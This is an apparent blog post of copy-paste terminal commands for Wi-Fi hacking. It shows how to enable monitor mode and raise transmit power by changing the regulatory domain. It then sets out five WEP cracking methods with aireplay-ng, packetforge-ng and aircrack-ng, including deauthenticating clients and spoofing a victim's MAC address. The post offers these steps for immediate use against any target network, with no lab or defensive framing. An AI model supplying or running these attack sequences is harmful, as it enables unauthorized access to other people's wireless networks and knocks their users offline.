🦑WIRELESS ANTENNA ALL YOU NEED IS HIT UP THOSE COMMANDS ON YOUR TERMINAL :)

🦑WIRELESS ANTENNA ALL YOU NEED IS HIT UP THOSE COMMANDS ON YOUR TERMINAL :)
- #Wifihacking


Open the Monitor Mode

root@joker:~# ifconfig wlan0mon down
root@joker:~# iwconfig wlan0mon mode monitor
root@joker:~# ifconfig wlan0mon up
Increase Wi-Fi TX Power
root@joker:~# iw reg set B0
root@joker:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@joker:~# iwconfig
Change WiFi Channel
root@joker:~# iwconfig wlan0 channel <SetChannel(1-14)>


WEP CRACKING



Method 1 : Fake Authentication Attack

root@joker:~# airmon-ng start wlan0
root@joker:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@joker:~# macchanger --show wlan0mon
root@joker:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@joker:~# aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b <BSSID> -h <OurMac> wlan0mon
root@joker:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 2 : ARP Replay Attack

root@joker:~# airmon-ng start wlan0
root@joker:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@joker:~# macchanger --show wlan0mon
root@joker:~# aireplay-ng -3 –x 1000 –n 1000 –b <BSSID> -h <OurMac> wlan0mon
root@joker:~# aircrack-ng –b <BSSID> <PCAP_of_FileName>

Method 3 : Chop Chop Attack

root@joker:~# airmon-ng start wlan0
root@joker:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@joker:~# macchanger --show wlan0mon
root@joker:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@joker:~# aireplay-ng -4 –b <BSSID> -h <OurMac> wlan0mon
 #Press ‘y’ ;
root@joker:~# packetforge-ng -0 –a <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@joker:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@joker:~# aircrack-ng <PCAP_of_FileName>

Method 4 : Fragmentation Attack

root@joker:~# airmon-ng start wlan0
root@joker:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#What’s my mac?
root@joker:~# macchanger --show wlan0mon
root@joker:~# aireplay-ng -1 0 –e <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@joker:~# aireplay-ng -5 –b<BSSID> -h < OurMac > wlan0mon
#Press ‘y’ ;
root@joker:~# packetforge-ng -0 –a <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@joker:~# aireplay-ng -2 –r <FileName2> wlan0mon
root@joker:~# aircrack-ng <PCAP_of_FileName>

Method 5 : SKA (Shared Key Authentication) Type Cracking

root@joker:~# airmon-ng start wlan0
root@joker:~# airodump-ng –c <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@joker:~# aireplay-ng -0 10 –a <BSSID> -c <VictimMac> wlan0mon
root@joker:~# ifconfig wlan0mon down
root@joker:~# macchanger –-mac <VictimMac> wlan0mon
root@joker:~# ifconfig wlan0mon up
root@joker:~# aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
root@joker:~# aireplay-ng –-deauth 1 –a <BSSID> -h <FakedMac> wlan0mon
root@joker:~# aircrack-ng <PCAP_of_FileName>

ENJOY❤️👍🏻

Post a Comment

0 Comments